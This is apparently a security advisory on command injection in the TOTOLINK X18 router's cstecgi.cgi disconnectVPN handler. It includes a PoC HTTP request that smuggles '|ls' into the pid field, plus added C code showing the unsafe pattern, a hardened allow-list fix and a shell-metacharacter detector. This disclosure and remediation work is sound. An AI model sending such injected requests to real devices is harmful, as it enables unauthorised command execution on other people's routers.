TOTOLINK X18 V9.1.0cu.2024_B20220329
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The pid parameter of the disconnectVPN handler in cstecgi.cgi is attacker-controllable. The supplied pid is concatenated directly into a command string without any validation and then passed to CsteSystem, which results in command execution. Note that IDA does not correctly recover the parameters of CsteSystem.
CsteSystem is implemented in /usr/lib/libcscommon.so. Analysis shows that the command is ultimately executed by invoking /bin/bash via execv.
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://192.168.109.161
Connection: close
Referer: http://192.168.109.161/advance/remote.html?timestamp=1667552118248
Cookie: SESSION_ID=2:1667546811:2
{"pid":"1111|ls","topicurl":"disconnectVPN"}
Test screenshot:
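To make the root cause and the fix concrete, the following C program is an added example written for this page; it is not code from the TOTOLINK firmware or from the advisory author. It reproduces the unsafe pattern described above (a pid value spliced into a command template) alongside a hardened replacement that validates the pid against a strict allow-list and builds an argv array for execv-style APIs instead of a shell command line, and it includes a small detection helper that flags the shell metacharacters present in the PoC body. The command template "kill %s", the argv contents and the buffer sizes are assumptions; the real command inside cstecgi.cgi is not shown on the page. The PoC body and the benign body in main() are constructed sample inputs.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound on the pid value; Linux pid_max never exceeds 4194304 (2^22). */
#define PID_MAX_VALUE 4194304L

/* Characters that turn a spliced value into an additional shell command. */
static const char SHELL_META[] = "|;&`$()<>\n\r'\"\\";

/* Mirrors the unsafe pattern from the advisory: the value is spliced into a
   command template with no validation.  The template "kill %s" is an
   assumption (the firmware's real template is not on the page).  The string
   is only built here, never executed.  Returns 0 on success. */
int build_unsafe_command(const char *pid, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "kill %s", pid);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Detection helper: 1 if the string contains any shell metacharacter,
   0 otherwise.  Usable as a rule over request bodies hitting cstecgi.cgi. */
int has_shell_metachar(const char *s) {
    return s != NULL && strpbrk(s, SHELL_META) != NULL;
}

/* Strict allow-list parser: a pid is 1..7 decimal digits, non-zero and no
   larger than PID_MAX_VALUE.  Returns 0 and stores the value on success,
   -1 on any deviation (so "1111|ls" from the PoC is rejected). */
int parse_pid_strict(const char *s, long *pid_out) {
    if (s == NULL || *s == '\0' || strlen(s) > 7)
        return -1;
    for (const char *p = s; *p != '\0'; p++)
        if (!isdigit((unsigned char)*p))
            return -1;
    long v = strtol(s, NULL, 10);
    if (v <= 0 || v > PID_MAX_VALUE)
        return -1;
    *pid_out = v;
    return 0;
}

/* Hardened replacement: validate first, then produce an argv array for an
   execv-style call instead of a shell command line, so no shell ever parses
   attacker input.  argv needs room for 4 pointers, pidbuf for 8 bytes.
   The binary name and signal are assumptions.  Returns 0 on success, -1 if
   the input is rejected; the fork/execv itself is left to the caller so the
   function can be exercised without side effects. */
int build_safe_argv(const char *pid, char *pidbuf, size_t pidbuflen,
                    char *argv[4]) {
    long v;
    if (parse_pid_strict(pid, &v) != 0)
        return -1;
    if (snprintf(pidbuf, pidbuflen, "%ld", v) >= (int)pidbuflen)
        return -1;
    argv[0] = "kill";
    argv[1] = "-TERM";
    argv[2] = pidbuf;
    argv[3] = NULL;
    return 0;
}

/* Pulls the value of the "pid" string field out of a request body shaped
   like the PoC body.  Minimal scanner, not a JSON parser: it assumes the
   field appears literally as "pid":"<value>".  Returns 0 on success. */
int extract_pid_field(const char *body, char *out, size_t outlen) {
    const char *p = strstr(body, "\"pid\":\"");
    if (p == NULL) return -1;
    p += strlen("\"pid\":\"");
    const char *q = strchr(p, '"');
    if (q == NULL || (size_t)(q - p) >= outlen) return -1;
    memcpy(out, p, (size_t)(q - p));
    out[q - p] = '\0';
    return 0;
}

int main(void) {
    /* Constructed samples: the PoC body from this page and a benign body. */
    const char *bodies[] = {
        "{\"pid\":\"1111|ls\",\"topicurl\":\"disconnectVPN\"}",
        "{\"pid\":\"1111\",\"topicurl\":\"disconnectVPN\"}",
    };
    for (size_t i = 0; i < 2; i++) {
        char pid[64], cmd[128], pidbuf[8], *argv[4];
        if (extract_pid_field(bodies[i], pid, sizeof pid) != 0) continue;
        build_unsafe_command(pid, cmd, sizeof cmd);
        printf("pid=%-10s unsafe=\"%s\" meta=%d hardened=%s\n", pid, cmd,
               has_shell_metachar(pid),
               build_safe_argv(pid, pidbuf, sizeof pidbuf, argv) == 0
                   ? "accepted" : "rejected");
    }
    return 0;
}
```

The two defences are independent: the digit-only allow-list removes the injection even if a shell is still used, and the argv construction removes the shell so a future validation slip cannot become command execution again. The metacharacter check is deliberately not the primary control; it is the signature a defender would log or alert on, since "1111|ls" trips it while any legitimate pid does not.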